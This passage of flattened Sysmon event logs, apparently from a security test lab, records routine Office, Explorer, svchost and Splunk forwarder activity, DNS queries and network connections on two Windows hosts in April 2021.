Office\Root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292800Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.436{BEA10069-D0C2-6086-1000-00000000BB01}9445492C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292799Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.436{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292798Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.307{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F57E5B7D302DE6AE8F9F5AEBD7F8F62,SHA256=DF319B5E434779F58FE0BF9A260D8D6D4F18FAE33AFEC493B0CF7E27C0180F0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441387Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:06.233{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441386Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:06.233{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292797Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:04.080{BEA10069-D0B7-6086-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50645-false10.0.1.14ip-10-0-1-14.us-west-2.compute.internal445microsoft-ds 23542300x8000000000000000441394Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:07.972{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D5328D3F7994F46FC7ADEF24D56BBE3,SHA256=F71927F66C9CFE4ED9B123B410A0E7EDB2453E9AC65D0EC45521AA69E9C9F822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441393Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:07.658{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6021413DAC42AAD031AC90544045E6A2,SHA256=3F6AEC24A992E25BFCC9FD7F275D7949AACA538D48BD969AAF34F0EA2E2D58E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292872Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.771{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A905E17FDEA0689C931E197CD82349CA,SHA256=D6C0A5FEC7674F7796FA8E50321B7FD6BE718C8D010E866F1318A2DD4C37D244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292871Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.771{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E99D92940FF922E0F1D3418289678D9C,SHA256=63731351CF29F897288DCAF31EB06E87D5E9D24AB75BF47FDD5D894CF2026F6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292870Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.671{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A05AF076DFDCCC73F1336BE069354647,SHA256=A13A529CFEDE3FA6CF74D516D7FB222004927BCCA4F4F09A83A90910B3409368,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292869Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.402{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6392050FC4287F1A4FFC83DADA38E10,SHA256=BA7E33B0077F31CE9C3EBBC1A8EDBD83304A9B0C022C9D5937D33C94660FF726,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441392Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.684{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62422-false10.0.1.12-8000- 354300x8000000000000000441391Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.240{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal50645-false10.0.1.14win-dc-932.attackrange.local445microsoft-ds 10341000x8000000000000000441390Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:07.234{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441389Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:07.234{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292868Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.286{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=041C8884FE5F510796DCA307F86A9906,SHA256=3C3DB83A111AD1778C8C4606096A1CE37F29FB9D56FFD80DE16104AFCC560F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292867Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.186{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=6D4FFC234D72154FD3286EB83CBF66C0,SHA256=3F0A963F077A94D5BF66A252B96126B36252BC19B11AC750659EE4BAB41CBD7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292866Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.155{BEA10069-D13E-6086-9900-00000000BB01}408NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292865Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.139{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292864Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.117{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292863Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.117{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=4B69D89CB24791B99723CF79F31168E8,SHA256=88E06E6FCAA919648778ED44A7B1ADB0477EE63F10EF3D43E9A231D3FC918DA0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292862Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.117{BEA10069-02A2-6088-122A-00000000BB01}62122868C:\Windows\system32\sppsvc.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x8000000000000000292861Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.117{BEA10069-02A2-6088-122A-00000000BB01}62122868C:\Windows\system32\sppsvc.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292860Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.101{BEA10069-D4AF-6086-5601-00000000BB01}4365800C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292859Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.101{BEA10069-D4AF-6086-5601-00000000BB01}4365800C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292858Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.086{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=31757BF07FEE9F73DD0FF7D2CC7C9CF2,SHA256=76224C8D89CA7FF2F44B2264837C89354319A919882280F5FC587A838EABDF1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292857Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.036{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BF1752165EA14E0BD9E28CDD7C19A296,SHA256=682E2289C4B710D86F47BCCE78B6945F622596B9F22B5E0BD89A864C5A0CE391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292856Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:07.001{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFFF7CC3E76F448C3FDB1F4B99FBDC66,SHA256=048BE7F18B3F988070A76B9DCF86150D36B017C36FF6A937B223BCC7F65EA6C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441401Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:08.889{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B43C0B649480E39B3A0B5312BE9384,SHA256=6E50BD6CD3B341D732EBCBBDC942CD36D993142EEF099E4B4171897BCB275C90,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000292876Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.709{BEA10069-02A1-6088-112A-00000000BB01}6568augloop.office.com0type: 5 augloop-prod.trafficmanager.net;type: 5 augloop-prod-000.westus.cloudapp.azure.com;::ffff:52.111.245.4;C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 22542200x8000000000000000292875Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.044{BEA10069-02A1-6088-112A-00000000BB01}6568support.content.office.net0type: 5 support.content.office.net.edgekey.net;type: 5 e584.g.akamaiedge.net;::ffff:23.60.72.96;C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 23542300x8000000000000000292874Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:08.404{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B232A644CEA306C7D96D1C718A81871C,SHA256=8F5D284350F1AFA84E6CD937337D897AC3969AA3A9DCEC40432A4A661526E594,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441400Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.466{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56401- 354300x8000000000000000441399Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.465{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98d0:a163:879d:ffff-56401-true7f00:1:0:0:0:0:0:0-53domain 354300x8000000000000000441398Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.440{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local56401- 354300x8000000000000000441397Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.191{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal60358- 10341000x8000000000000000441396Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:08.235{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441395Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:08.235{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292873Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.063{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50646-false23.60.72.96a23-60-72-96.deploy.static.akamaitechnologies.com443https 23542300x8000000000000000441406Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:09.900{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8D497BF28CAD3F71FB8FC620149984,SHA256=E98A00962F42BF4E97DAD5F6C8908138526B85E682206742F38DFFA7E1E45E81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292911Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292910Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 